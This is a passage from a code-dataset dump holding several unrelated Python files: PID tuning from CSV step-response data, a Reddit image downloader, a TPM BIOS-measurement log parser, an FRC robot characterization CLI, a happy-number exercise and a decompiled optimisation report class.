AND result > 0\n order by round\n \"\"\", (user_id, comp_id))\n results = []\n for val in data_set:\n results += [val['result']]\n data = {\n 'comp_id': comp_id,\n 'shooter': data_set[0]['first_name'] + \" \" + data_set[0]['surname'] if data_set else None,\n 'rounds': [r for r, idx in enumerate(range(len(data_set)), start=1)] if data_set else None,\n 'results_arr': results if data_set else None,\n 'average': [(sum(results) / len(results)) for avg in range(len(data_set))] if data_set else None\n }\n return data","sub_path":"src/app/core/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":5800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"591572346","text":"\"\"\" \nArchivo que contiene todas las rutinas necesarias para la funcionalidad de identificación de modelo y tunning con csv\n\"\"\"\n\nfrom scipy.ndimage import gaussian_filter\n\nimport matplotlib.ticker as mticker\nimport controlmdf as ctrl\nimport numpy as np\n\n\ndef procesar_csv(self, csv_data):\n \"\"\"\n Función para procesar la data del archivo csv, se crea una nueva data en un diccionario, se normalizan las escalas con el span y se transforma el tiempo a segundos. Para la transformación de tiempo a segundos los formatos aceptados son:\n \n hh:mm:ss\n \n mm:ss\n \n ss\n \n En cualquiera de los casos se llevara a segundos y se restara el tiempo inicial para que empiece en cero.\n \n :param csv_data: Data del csv\n :type csv_data: numpyArray\n :return: Data extraida del archivo CSV asi como indices, máximos y mínimos de la data\n :rtype: tuple(dict, list[int, int, int, float, float, float, float])\n \"\"\"\n\n # Identificacion de columnas\n for i, header in enumerate(csv_data[0]):\n if 'time' in header.lower():\n indexTime = i\n if 'vp' in header.lower():\n indexVp = i\n if 'efc' in header.lower():\n indexEFC = i\n\n csv_data = np.delete(csv_data, 0, 0)\n\n dict_data = dict()\n try:\n dict_data['time'] = np.array(csv_data[:, indexTime])\n dict_data['vp'] = np.array(list(map(float, csv_data[:, indexVp])))\n dict_data['efc'] = np.array(list(map(float, csv_data[:, indexEFC])))\n except UnboundLocalError:\n raise UnboundLocalError\n\n Tiempo = []\n\n # Transformación de tiempo a segundos\n for time_entry in dict_data['time']:\n my_time = str(time_entry)\n t1 = sum(i * j for i, j in zip(list(map(float, my_time.split(':')))[::-1], [1, 60, 3600]))\n Tiempo.append(t1)\n\n dict_data['time'] = np.array(Tiempo) - Tiempo[0]\n\n MinVP = float(self.main.EditLVP.text())\n MaxVP = float(self.main.EditUVP.text())\n MinEFC = float(self.main.EditLEFC.text())\n MaxEFC = float(self.main.EditUEFC.text())\n\n # Normalización\n FactorVP = 100 / MaxVP - MinVP\n FactorEFC = 100 / MaxEFC - MinEFC\n\n dict_data['vp'] = (dict_data['vp']-MinVP)*FactorVP\n dict_data['efc'] = (dict_data['efc']-MinEFC)*FactorEFC\n\n dict_data['time'] = dict_data['time']\n dict_data['vp'] = gaussian_filter(dict_data['vp'], 5)\n dict_data['efc'] = gaussian_filter(dict_data['efc'], 2)\n\n return dict_data, [indexTime, indexVp, indexEFC, MinVP, MaxVP, MinEFC, MaxEFC]\n\n\ndef calcular_modelo(self,\n dict_data,\n indexTime,\n indexVp,\n indexEFC,\n MinVP,\n MaxVP,\n MinEFC,\n MaxEFC):\n \"\"\"\n Función para calcular los parametros del modelo de primer orden\n \n :param dict_data: Diccionario con la data procesada del csv\n :type dict_data: dict\n :param indexTime: Indice que identifica al tiempo\n :type indexTime: int\n :param indexVp: Indice que identifica a Vp\n :type indexVp: int\n :param indexEFC: Indice 
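The timestamp conversion in procesar_csv above reverses the split fields so they pair with (1, 60, 3600); because zip truncates at the shorter sequence, the same expression handles hh:mm:ss, mm:ss and bare seconds. A standalone check with invented stamps:

def to_seconds(stamp):
    # Reverse the fields so seconds pair with 1, minutes with 60 and
    # hours with 3600; zip() stops at the shorter argument.
    parts = list(map(float, stamp.split(":")))[::-1]
    return sum(value * unit for value, unit in zip(parts, (1, 60, 3600)))

assert to_seconds("01:02:03") == 3723.0   # 1*3600 + 2*60 + 3
assert to_seconds("02:03") == 123.0
assert to_seconds("45") == 45.0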
que identifica al EFC\n :type indexEFC: int\n :param MinVP: Limite inferior de Vp\n :type MinVP: float\n :param MaxVP: Limite superior de Vp\n :type MaxVP: float\n :param MinEFC: Limite inferior de EFC\n :type MinEFC: float\n :param MaxEFC: Limite superior de EFC\n :type MaxEFC: float\n :return: Datos del modelo de primer orden, recta tangente y puntos asociados a la recta\n :rtype: tuple(float, float, float, float, float, float, float, float, float)\n \"\"\"\n\n y = dict_data['vp']\n t = dict_data['time']\n\n vpmin = np.min(dict_data['vp'][0])\n vpmax = np.max(dict_data['vp'][-1])\n efcmin = np.min(dict_data['efc'][0])\n efcmax = np.max(dict_data['efc'][-1])\n\n i_max = np.argmax(np.abs(np.gradient(y)))\n efc_max = np.argmax(np.abs(np.gradient(dict_data['efc'])))\n\n for index, i in enumerate(y):\n if i >= 0.63 * (vpmax-vpmin) + vpmin:\n indexv = index\n break\n\n Kc = (vpmax - vpmin)/(efcmax - efcmin)\n\n slop_efc = (dict_data['efc'][efc_max] - dict_data['efc'][efc_max - 1]) / (t[efc_max] - t[efc_max - 1])\n t0 = ((efcmin - dict_data['efc'][efc_max]) / (slop_efc) + t[efc_max])\n \n slop = (y[i_max] - y[i_max - 1]) / (t[i_max] - t[i_max - 1])\n t1 = ((vpmin - y[i_max]) / (slop) + t[i_max])\n \n t2 = t[indexv]\n y1 = vpmin\n y2 = slop * (t2 - t[i_max]) + y[i_max]\n tau = t2 - t1\n anclaT = t[i_max]\n anclaY = y[i_max]\n\n return Kc, tau, y1, y2, t0, t1, t2, anclaT, anclaY\n\n\ndef entonar_y_graficar(self, dict_data, Kc, tau, y1, y2, t0, t1, t2):\n \"\"\"\n Función para calcular el controlador PID a partir de los datos del modelo de primer orden, ademas, se graficá la data del csv junto con algunos parametros de la identificación del modelo\n \n :param dict_data: Diccionario con la data procesada del csv\n :type dict_data: dict\n :param Kc: Ganancia del proceso\n :type Kc: float\n :param tau: Constante de tiempo del proceso\n :type tau: float\n :param y1: Punto y1 de la recta de identificación, en este punto se encuentra el mayor cambio respecto al tiempo\n :type y1: float\n :param y2: Punto y2 de la recta de identificación\n :type y2: float\n :param t0: Tiempo del inicio del escalón\n :type t0: float\n :param t1: Tiempo del inicio de la respuesta del proceso ante el escalón\n :type t1: float\n :param t2: Tiempo en el que el proceso alcanza el 63% de su valor final respecto al cambio\n :type t2: float\n :return: Lista de objetos de gráficas y lista de parametros de la recta para el modelado\n :rtype: tuple(list[ObjectType, ObjectType, ObjectType, ObjectType, ObjectType, ObjectType, ObjectType, ObjectType], list[float, float, float, float, float, float])\n \"\"\"\n\n kp, ki, kd = auto_tuning_method_csv(self, Kc, tau, t1-t0, self.main.csvMetodo.currentText())\n\n self.main.csvGraphicsView.canvas.axes1.clear()\n self.main.csvGraphicsView.canvas.axes1.plot(dict_data['time'],\n dict_data['efc'],\n label='EFC')\n\n t0_efc = self.main.csvGraphicsView.canvas.axes1.axvline(x=t0,\n color='k',\n linestyle=':',\n zorder=-20,\n label='t0, t1, t2')\n t1_efc = self.main.csvGraphicsView.canvas.axes1.axvline(x=t1,\n color='k',\n linestyle=':',\n zorder=-20)\n t2_efc = self.main.csvGraphicsView.canvas.axes1.axvline(x=t2,\n color='k',\n linestyle=':',\n zorder=-20)\n\n self.main.csvGraphicsView.canvas.axes1.grid(True, which=\"both\", color=\"lightgray\")\n self.main.csvGraphicsView.canvas.axes1.legend()\n self.main.csvGraphicsView.canvas.axes1.yaxis.set_major_formatter(\n mticker.FormatStrFormatter(\"%.1f %%\")\n )\n\n self.main.csvGraphicsView.canvas.axes2.clear()\n 
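A small sanity check of the 63% rule that calcular_modelo applies: on a synthetic first-order response (assumed gain 2 and time constant 5, unit step at t=0), the time to reach 63.2% of the final change recovers tau. This is only a sketch; the routine above additionally fits the tangent line and locates the step onset t0.

import numpy as np

K_true, tau_true = 2.0, 5.0
t = np.linspace(0, 50, 5001)
y = K_true * (1.0 - np.exp(-t / tau_true))

Kc = y[-1] / 1.0                        # gain: delta_vp / delta_efc, unit step
i63 = np.argmax(y >= 0.632 * y[-1])     # first index past 63.2% of the change
tau_est = t[i63]                        # step starts at t=0, so t2 - t1 = t2
print(Kc, tau_est)                      # ~2.0 and ~5.0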
self.main.csvGraphicsView.canvas.axes2.plot(dict_data['time'],\n dict_data['vp'],\n label='Vp')\n\n recta, = self.main.csvGraphicsView.canvas.axes2.plot([t1, t2], [y1, y2], label='recta')\n\n t0_vp = self.main.csvGraphicsView.canvas.axes2.axvline(x=t0,\n color='k',\n linestyle=':',\n zorder=-20,\n label='t0, t1, t2')\n t1_vp = self.main.csvGraphicsView.canvas.axes2.axvline(x=t1,\n color='k',\n linestyle=':',\n zorder=-20)\n t2_vp = self.main.csvGraphicsView.canvas.axes2.axvline(x=t2,\n color='k',\n linestyle=':',\n zorder=-20)\n\n self.main.csvGraphicsView.canvas.axes2.grid(True, which=\"both\", color=\"lightgray\")\n self.main.csvGraphicsView.canvas.axes2.legend()\n self.main.csvGraphicsView.canvas.axes2.yaxis.set_major_formatter(\n mticker.FormatStrFormatter(\"%.1f %%\")\n )\n\n self.main.csvGraphicsView.canvas.draw()\n self.main.csvGraphicsView.toolbar.update()\n\n actualizar_Datos(self, Kc, t0, t1, t2, kp, ki, kd)\n self.main.pidTiempoSlider.blockSignals(True)\n self.main.pidTiempoSlider.setValue(np.round(1000*(t1-t0)/(t2-t0), 3))\n self.main.pidTiempoLabelValue.setText(str(np.round(t1, 3)))\n self.main.pidTiempoSlider.blockSignals(False)\n\n\n return [t0_efc, t1_efc, t2_efc, recta, t0_vp, t1_vp, t2_vp], [Kc, t0, t1, t2, y2, y1]\n\n\ndef calculos_manual(self, GraphObjets, Kc, t0, t1, t2, slop, y1):\n \"\"\"\n Función para recalcular el controlador PID a partir de los datos del modelo de primer orden con el nuevo tiempo t1, ademas, se grafica la data del csv junto con algunos parametros de la identificación del modelo y la nueva recta\n \n :param GraphObjets: Lista de objetos de graficacion\n :type GraphObjets: list\n :param Kc: Ganancia del proceso\n :type Kc: float\n :param t0: Tiempo del inicio del escalón\n :type t0: float\n :param t1: Tiempo del inicio de la respuesta del proceso ante el escalón\n :type t1: float\n :param t2: Tiempo en el que el proceso alcanza el 63% de su valor final respecto al cambio\n :type t2: float\n :param slop: Pendiente de la recta de identificación\n :type slop: float\n :param y1: Punto y1 de la recta de identificación, en este punto se encuentra el mayor cambio respecto al tiempo\n :type y1: float\n \"\"\"\n kp, ki, kd = auto_tuning_method_csv(self, Kc, t2-t1, t1-t0, self.main.csvMetodo.currentText())\n\n GraphObjets[1].set_data(t1, [0, 1])\n GraphObjets[5].set_data(t1, [0, 1])\n new_y2 = slop * (t2 - t1) + y1\n GraphObjets[3].set_data([t1, t2], [y1, new_y2])\n self.main.csvGraphicsView.canvas.draw()\n actualizar_Datos(self, Kc, t0, t1, t2, kp, ki, kd)\n\n\ndef actualizar_Datos(self, Kc, t0, t1, t2, kp, ki, kd):\n \"\"\"\n Función para mostrar los resultados obtenidos del modelo en un TextEdit\n \n :param Kc: Ganancia del proceso\n :type Kc: float\n :param t0: Tiempo del inicio del escalón\n :type t0: float\n :param t1: Tiempo del inicio de la respuesta del proceso ante el escalón\n :type t1: float\n :param t2: Tiempo en el que el proceso alcanza el 63% de su valor final respecto al cambio\n :type t2: float\n :param kp: Ganancia proporcional\n :type kp: float\n :param ki: Ganancia integral\n :type ki: float\n :param kd: Ganancia derivativa\n :type kd: float\n \"\"\"\n \n Datos = \"Modelo:\\n\"\n Datos += str(ctrl.TransferFunction([Kc], [t2-t1, 1])) + \"\\n\"\n Datos += f\"Delay: {t1-t0:.3f}\\n\"\n Datos += \"----------------------------------------------\\n\"\n Datos += f\"Kp: {kp:.4f}\\n\"\n Datos += f\"Ki: {ki:.4f}\\n\"\n Datos += f\"Kd: {kd:.4f}\\n\"\n self.main.csvdatosTextEdit2.setPlainText(Datos)\n self.main.pidLabelController.setText(\n f\" Kc = 
{Kc:.3f} -- Tau = {t2-t1:.3f} -- Alpha = {t1-t0:.3f}\")\n\n\ndef auto_tuning_method_csv(self, k_proceso, tau, alpha, metodo):\n \"\"\"\n Función para obtener las ganancias del controlador PID a partir de los parametros del modelo de primer orden obtenidos de una respuesta escalón, las formulas son las dadas por Ziegler-Nichols y Cohen-Coon para una respuesta escalón en lazo abierto\n \n :param k_proceso: Ganancia del proceso\n :type k_proceso: float\n :param tau: Constante de tiempo del proceso\n :type tau: float\n :param alpha: Tiempo muerto o delay del proceso\n :type alpha: float\n :param metodo: Método a utilizar\n :type metodo: str\n :return: Ganancias kp, ki y kd\n :rtype: tuple(float, float, float)\n \"\"\"\n \n if alpha <= 0.05:\n print('Alfa es demasiado pequeño')\n raise TypeError('Alfa es demasiado pequeño')\n\n if 'ZN' in metodo:\n if 'P--' in metodo:\n kp = (1/k_proceso) * (tau/alpha)\n ti = np.infty\n td = 0\n\n if 'PI-' in metodo:\n kp = (0.9/k_proceso) * (tau/alpha)\n ti = alpha * 3.33\n td = 0\n\n if 'PID' in metodo:\n kp = (1.2/k_proceso) * (tau/alpha)\n ti = alpha * 2\n td = alpha * 0.5\n\n kp = kp\n ki = kp / ti\n kd = kp * td\n\n if 'CC' in metodo:\n if 'P--' in metodo:\n kp = (1/k_proceso) * (tau/alpha) * (1 + (1/3) * (alpha/tau))\n ti = np.infty\n td = 0\n\n if 'PI-' in metodo:\n kp = (1/k_proceso) * (tau/alpha) * (0.9 + (1/12) * (alpha/tau))\n ti = alpha * ((30 + 3 * (alpha/tau)) / (9 + 20 * (alpha/tau)))\n td = 0\n\n if 'PD-' in metodo:\n kp = ((1/k_proceso) * (tau/alpha) * ((5/4) + (1/6) * (alpha/tau)))\n ti = np.infty\n td = alpha * ((6 - 2 * (alpha/tau)) / (22 + 3 * (alpha/tau)))\n\n\n if 'PID' in metodo:\n kp = ((1/k_proceso) * (tau/alpha) * ((4/3) + (1/4) * (alpha/tau)))\n ti = alpha * ((32 + 6 * (alpha/tau)) / (13 + 8 * (alpha/tau)))\n td = alpha * (4 / (11 + 2 * (alpha/tau)))\n\n kp = kp / 2\n ki = kp / ti\n kd = kp * td\n\n return kp, ki, kd\n","sub_path":"rutinas/rutinas_CSV.py","file_name":"rutinas_CSV.py","file_ext":"py","file_size_in_byte":13998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"312198530","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 1 09:49:16 2018\n\n@author: tom\n\"\"\"\n\nimport praw\nimport requests\nimport os\nfrom imgurpython import ImgurClient\n\n\ndef downloadImgurAlbum(albumUrl):\n #print(albumUrl)\n print('Found an album')\n albumId = submission.url.split(\"/\")[-1]\n if '#' in albumId:\n albumId = albumId.split('#')[0]\n dir_path = targetSubreddit + '/' + albumId\n os.makedirs(dir_path, exist_ok=True) \n items = client.get_album_images(albumId)\n for item in items:\n imageUrl = item.link\n #print(imageUrl)\n localFileName = imageUrl.split(\"/\")[-1]\n response = requests.get(imageUrl)\n if response.status_code == 200:\n print('Downloading %s from %s...' % (localFileName,albumId))\n with open(os.path.join(dir_path, localFileName), 'wb') as fo:\n for chunk in response.iter_content(1024):\n fo.write(chunk)\n\ndef downloadImage(imageUrl):\n #print(imageUrl)\n localFileName = imageUrl.split(\"/\")[-1]\n dir_path = targetSubreddit\n os.makedirs(dir_path, exist_ok=True)\n response = requests.get(imageUrl)\n if response.status_code == 200:\n print('Downloading %s...' 
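The Ziegler-Nichols open-loop PID branch of auto_tuning_method_csv above, isolated as a standalone function with made-up process parameters; the parallel-form gains follow as ki = kp/Ti and kd = kp*Td.

def zn_pid(k_proc, tau, alpha):
    # Ziegler-Nichols reaction-curve PID rules, as in the code above:
    # Kp = (1.2/K) * (tau/alpha), Ti = 2*alpha, Td = 0.5*alpha.
    kp = (1.2 / k_proc) * (tau / alpha)
    ti, td = 2.0 * alpha, 0.5 * alpha
    return kp, kp / ti, kp * td

kp, ki, kd = zn_pid(k_proc=2.0, tau=5.0, alpha=1.0)
print(kp, ki, kd)  # 3.0, 1.5, 1.5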
% (localFileName))\n with open(os.path.join(dir_path, localFileName), 'wb') as fo:\n for chunk in response.iter_content(1024):\n fo.write(chunk)\n \ndef downloadImgurImage(imageUrl, localFileName):\n pass\n\nclient_id = ''\nclient_secret = ''\n\nclient = ImgurClient(client_id, client_secret)\n\nreddit = praw.Reddit('bot1')\n\ntargetSubreddit = \"\"\npost_limit = 100\n\nsubmissions = reddit.subreddit(targetSubreddit).top(limit=post_limit) \n\nfilename = targetSubreddit # input('enter filename: ')\nos.makedirs(filename, exist_ok=True)\ndir_path = os.path.join(filename, \"%s_output.txt\" % filename)\ntext_file = open(dir_path, \"w\", errors ='ignore')\n\nfor submission in submissions:\n link = submission.url\n # print(\"Link: \", link)\n if \"imgur.com/a/\" in link:\n #Send to imgur album downloader\n downloadImgurAlbum(link)\n #Save URL\n text_file.write('{0}\\n'.format(link))\n \n elif link.endswith(\".jpg\") or link.endswith(\".png\") or link.endswith(\".gif\"):\n #Send to image downloader\n downloadImage(link)\n #Save URL\n text_file.write('{0}\\n'.format(link))\n elif \"imgur.com/\" in link and not link.endswith(\".gifv\"):\n #Send to single image imgur downloader\n # downloadImgurImage()\n #Save URL\n text_file.write('{0}\\n'.format(link))\ntext_file.close()\n\nprint('\\nDownloading done! Have a good day :)')","sub_path":"TomBot_Reddit/tombot.py","file_name":"tombot.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"165412953","text":"#!/usr/bin/env python3\nimport sys\nimport argparse\nimport struct\nimport binascii\nimport hashlib\n\n\nclass TCPAEvent:\n def __init__(self,\n pcr_index, event_type, pcr_value, event_size, event_data):\n self.pcr_index = pcr_index\n self.event_type = event_type\n self.pcr_value = pcr_value\n self.event_size = event_size\n self.event_data = event_data\n self.valid = self.__validate()\n\n def __validate(self):\n h = hashlib.sha1()\n h.update(self.event_data)\n data_digest = h.digest()\n return self.pcr_value == data_digest\n\n def __str__(self):\n return \"{:<3} {:<8x} {} {:<4} {:<5} {}\".format(\n self.pcr_index,\n self.event_type,\n binascii.hexlify(self.pcr_value).decode(),\n self.event_size,\n self.valid,\n self.event_data[:30])\n\n\nclass TCPAParser(struct.Struct):\n def __init__(self, bpath):\n super().__init__(\"= 17 and pcrnum <= 22):\n self.value = b\"\\xFF\" * 20\n else:\n self.value = b\"\\x00\" * 20\n self.__hex()\n\n def __hex(self):\n self.hval = binascii.hexlify(self.value).decode().upper()\n\n def update(self, value):\n h = hashlib.sha1()\n h.update(self.value + value)\n self.value = h.digest()\n self.__hex()\n\n def __str__(self):\n return \"PCR-{:02d}: {}\".format(\n self.pcrnum,\n \" \".join([self.hval[i:i+2] for i in range(0, len(self.hval), 2)]))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"TPM binary measurement parser.\")\n parser.add_argument(\"-f\",\n default=\"/sys/kernel/security/tpm0/binary_bios_measurements\",\n metavar=\"binary_bios_measurements_file\",\n dest=\"bfile\",\n help=\"binary_bios_measurements file path\")\n parser.add_argument(\"-r\",\n default=list(),\n action=\"append\",\n nargs=2,\n metavar=(\"ID\", \"SHA1HASH\"),\n dest=\"replacelist\",\n help=\"Replace event ID pcr_value with SHA1HASH. 
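downloadImage/downloadImgurAlbum above write the response in 1024-byte chunks but call requests.get without stream=True, so the whole body is fetched eagerly before iter_content slices it. A minimal streaming variant (the URL below is a placeholder, not taken from the script):

import os
import requests

def download(url, dest_dir):
    # Same chunked-write pattern as downloadImage(); stream=True keeps
    # large files out of memory instead of buffering the full response.
    os.makedirs(dest_dir, exist_ok=True)
    local_name = url.split("/")[-1]
    resp = requests.get(url, stream=True, timeout=30)
    if resp.status_code == 200:
        with open(os.path.join(dest_dir, local_name), "wb") as fo:
            for chunk in resp.iter_content(1024):
                fo.write(chunk)

# download("https://example.com/picture.jpg", "downloads")  # placeholder URL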
Could be used multiple times.\")\n args = parser.parse_args()\n\n tcpa_data = list()\n pcrs = list()\n\n for p in range(24):\n pcrs.append(PCR(p))\n\n for event in TCPAParser(args.bfile):\n tcpa_data.append(event)\n\n for ev_id, pcr_val in args.replacelist:\n try:\n ev_id = int(ev_id)\n if len(pcr_val) != 40:\n print(\"Replacement ID {} hash length error!\".format(ev_id))\n sys.exit(1)\n print(\"Replacing event ID {} hash {} with {}\".format(\n ev_id,\n binascii.hexlify(tcpa_data[ev_id].pcr_value).decode(),\n pcr_val))\n tcpa_data[ev_id].pcr_value = binascii.unhexlify(pcr_val)\n except (TypeError, ValueError):\n print(\"Replacement ID {} value error!\".format(ev_id))\n sys.exit(1)\n except IndexError:\n print(\"Replacement ID {} is out of event index!\".format(ev_id))\n sys.exit(1)\n\n for event in tcpa_data:\n pcrs[event.pcr_index].update(event.pcr_value)\n\n print(\"{:<3} {:<3} {:<8} {:<40} {:<4} {} {}\".format(\n \"Num\", \"PCR\", \"EV_type\", \"PCR_value\", \"Size\", \"Valid\", \"Data\"))\n for num, event in enumerate(tcpa_data):\n print(\"{:<3} {}\".format(num, event))\n\n print()\n print(\"Final PCRs:\")\n for p in pcrs:\n print(p)\n","sub_path":"binary_bios_measurements_parser.py","file_name":"binary_bios_measurements_parser.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"644671440","text":"# The CLI entry point for the characterization toolsuite.\n\nimport argparse\nfrom os import getcwd\nfrom sys import argv\nfrom functools import partial\n\nimport argcomplete\nimport frc_characterization\nimport frc_characterization.logger_analyzer.data_analyzer as analyzer\nimport frc_characterization.logger_analyzer.data_logger as logger\nimport frc_characterization.logger_gui as logger_gui\nimport frc_characterization.newproject as newproject\nfrom frc_characterization.newproject import Tests\n\nfrom consolemenu import ConsoleMenu\nfrom consolemenu.items import FunctionItem, SubmenuItem\n\nlangs = (\"java\", \"cpp\", \"python\")\n\ncontrollers = (\"spark\", \"talonsrx\")\n\n\ndef new_project(testType, directory=None):\n newproject.main(testType)\n\n\ndef get_analyzer(directory=None):\n analyzer.main(directory or getcwd())\n\n\ndef get_logger(testType, directory=None):\n logger_gui.main(0, directory or getcwd(), logger.TestRunner, test=testType)\n\n\ntool_dict = {\n \"drive\": {\n \"new\": partial(new_project, testType=Tests.DRIVETRAIN),\n \"logger\": partial(get_logger, testType=Tests.DRIVETRAIN),\n \"analyzer\": get_analyzer,\n },\n \"arm\": {\n \"new\": partial(new_project, testType=Tests.ARM),\n \"logger\": partial(get_logger, testType=Tests.ARM),\n \"analyzer\": get_analyzer,\n },\n \"elevator\": {\n \"new\": partial(new_project, testType=Tests.ELEVATOR),\n \"logger\": partial(get_logger, testType=Tests.ELEVATOR),\n \"analyzer\": get_analyzer,\n },\n \"simple-motor\": {\n \"new\": partial(new_project, testType=Tests.SIMPLE_MOTOR),\n \"logger\": partial(get_logger, testType=Tests.SIMPLE_MOTOR),\n \"analyzer\": get_analyzer,\n },\n}\n\n\ndef main():\n\n if len(argv) < 2:\n menu = ConsoleMenu(\n \"Mechanism Types\", \"Choose which mechanism you are characterizing\"\n )\n\n for mechanism, tools in tool_dict.items():\n tool_menu = ConsoleMenu(f\"Characterization Tools: {mechanism}\")\n for tool, function in tools.items():\n tool_menu.append_item(FunctionItem(tool, function, menu=tool_menu))\n\n menu.append_item(SubmenuItem(mechanism, tool_menu, menu))\n\n menu.show()\n\n else:\n parser = 
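The PCR.update method in the parser above is the TPM 1.2 extend operation: new = SHA1(old || measurement). A standalone sketch with invented event digests, showing that extend is order-sensitive, which is what allows the replayed PCRs to be compared against the chip's values:

import hashlib

def extend(pcr, measurement):
    # TPM 1.2 PCR extend, as in PCR.update() above:
    # new = SHA1(old_value || measurement), both 20-byte SHA-1 digests.
    return hashlib.sha1(pcr + measurement).digest()

pcr = b"\x00" * 20                          # PCRs 0-16 start zeroed
ev1 = hashlib.sha1(b"event one").digest()
ev2 = hashlib.sha1(b"event two").digest()

a = extend(extend(pcr, ev1), ev2)
b = extend(extend(pcr, ev2), ev1)
assert a != b   # order matters, so a replayed log must match event-for-event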
argparse.ArgumentParser(description=\"FRC characterization tools CLI\")\n parser.add_argument(\n \"mech_type\",\n choices=list(tool_dict.keys()),\n help=\"Mechanism type being characterized\",\n )\n parser.add_argument(\n \"tool_type\",\n choices=list(list(tool_dict.values())[0].keys()),\n help=\"Create new project, start data recorder/logger, or start data analyzer\",\n )\n parser.add_argument(\n \"project_directory\",\n help=\"Location for the project directory (if creating a new project)\",\n nargs=\"?\",\n default=None,\n )\n argcomplete.autocomplete(parser)\n\n args = parser.parse_args()\n tool_dict[args.mech_type][args.tool_type](directory=args.project_directory)\n\n\nif __name__ == \"__main__\":\n\n main()\n","sub_path":"frc_characterization/cli/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"19305183","text":"# Write an algorithm to determine if a number is \"happy\"\n# A happy number is a number defined by the following process:\n# Starting with any positive integer, replace the number by the sum of the squares of its digits,\n# and repeat the process until the number equals 1 (Where it will stay),\n# or it loops endlessly in a cycle which does not include 1.\n# Those numbers for which this process ends in 1 are happy numbers.\n# For example: 19 is a happy number.\n# 1^2 + 9^2 = 82\n# 8^2 + 2^2 = 68\n# 6^2 + 8^2 = 100\n# 1^2 + 0^2 + 0^2 = 1\n\n\n# 不是快乐数的数称为不快乐数(unhappy number),所有不快乐数的数位平方和计算,最後都会进入一个循环中,并且肯定会出现一个已经出现过的数。\n# 因此,只需要记录所有出现过的数,一旦检测到计算出的数前面出现过,就可以判定为不快乐数,否则一直计算到出现1为止\nclass Solution(object):\n def is_happy(self, n):\n \"\"\"\n :type n: int\n :rtype: bool\n \"\"\"\n # 使用字典而不是列表来存储,是因为字典的查询速度比列表快\n lookup = {}\n while n != 1 and n not in lookup:\n lookup[n] = True\n s = str(n)\n n1 = 0\n for i in s:\n n1 += int(i) ** 2\n n = n1\n return n == 1\n\nif __name__ == '__main__':\n print(Solution().is_happy(19))\n","sub_path":"LeetCode/Easy/Happy_Number/Happy_Number.py","file_name":"Happy_Number.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"445880758","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: C:\\Users\\Felipe\\surropt\\build\\lib\\surropt\\core\\procedures\\output.py\n# Compiled at: 2019-11-12 19:57:24\n# Size of source mod 2**32: 5050 bytes\nimport os\nfrom abc import ABC, abstractmethod\nimport numpy as np\nfrom colorama import Fore, Style, deinit, init\nfrom scipy.linalg import norm\nfrom scipy.spatial import cKDTree\n\nclass Report(ABC):\n\n def __init__(self, terminal=False, plot=False):\n super().__init__()\n self.terminal = terminal\n self.plot = plot\n\n @property\n def terminal(self):\n \"\"\"Whether or not to print each iteration info as string.\"\"\"\n return self._terminal\n\n @terminal.setter\n def terminal(self, value):\n if isinstance(value, bool):\n self._terminal = value\n else:\n raise ValueError(\"'terminal' property only accepts True or False.\")\n\n @property\n def plot(self):\n \"\"\"Whether or not to plot the iteration process.\"\"\"\n return self._plot\n\n @plot.setter\n def plot(self, value):\n if isinstance(value, bool):\n self._plot = value\n else:\n raise ValueError(\"'plot' property only accepts True or False.\")\n\n def print_iteration(self, iter_count: int, x: list, f_pred: float, 
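The comment block in the happy-number solution above works through 19 by hand; here is a short standalone trace of the same digit-square-sum process, stopping at 1 or at the first repeated value:

def digit_square_sum(n):
    # One step of the happy-number process: 19 -> 1^2 + 9^2 = 82.
    return sum(int(d) ** 2 for d in str(n))

seq = [19]
while seq[-1] != 1 and seq[-1] not in seq[:-1]:
    seq.append(digit_square_sum(seq[-1]))
print(seq)  # [19, 82, 68, 100, 1] -- matches the worked example in the comments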
f_actual: float, g_actual: float, header=False, color_font=None):\n n_x = len(x)\n if header:\n mv_header = [' x' + str(i + 1) for i in range(n_x)]\n str_arr = ['Movement', 'Iter'] + mv_header + [\n 'f_pred', 'f_actual', 'feasibility']\n arr_str = (('{:10}\\t' * len(str_arr)).format)(*str_arr)\n else:\n i = str(iter_count)\n mv_arr = np.array(x)\n num_arr = np.append(x, np.array([f_pred, f_actual, g_actual]))\n formatter = {'float_kind': lambda x: '{0: 10.4e}'.format(x)}\n str_arr = np.array2string(num_arr, separator='\\t', max_line_width=(os.get_terminal_size()[0]),\n formatter=formatter)[1:-1]\n mov = 'test'\n arr_str = '{0:10}\\t{1:10}\\t{2}'.format(mov, i, str_arr)\n if self.terminal:\n if color_font == 'red':\n print(Fore.RED + arr_str)\n else:\n print(Fore.RESET + arr_str)\n return arr_str\n\n def plot_iteration(self):\n if self.plot:\n raise NotImplementedError('plot iteration not implemented!')\n\n def get_results_report(self, index: int, r: float, x: np.ndarray, f: np.ndarray, lb: np.ndarray, ub: np.ndarray, fun_evals: int) -> str:\n \"\"\"Returns the results message report that contains info about the\n neighbourhood of `x` inside a specified domain (`lb` and `ub`).\n\n Parameters\n ----------\n index : int\n Row index of `x` that corresponds to the optimal point.\n r : float\n Radius percentage of the domain euclidian range (`lb` and `ub`) to\n search points near `x`.\n x : np.ndarray\n Sample input variables to be analysed (2D array).\n f : np.ndarray\n Sample observed objective function values (1D array, number of\n elements has to be the same as the number of rows in `x`).\n lb : np.ndarray\n Domain lower bound of the sample `x`. It is assumed that ALL the\n row of `x` are inside this domain.\n ub : np.ndarray\n Domain upper bound of the sample `x`. 
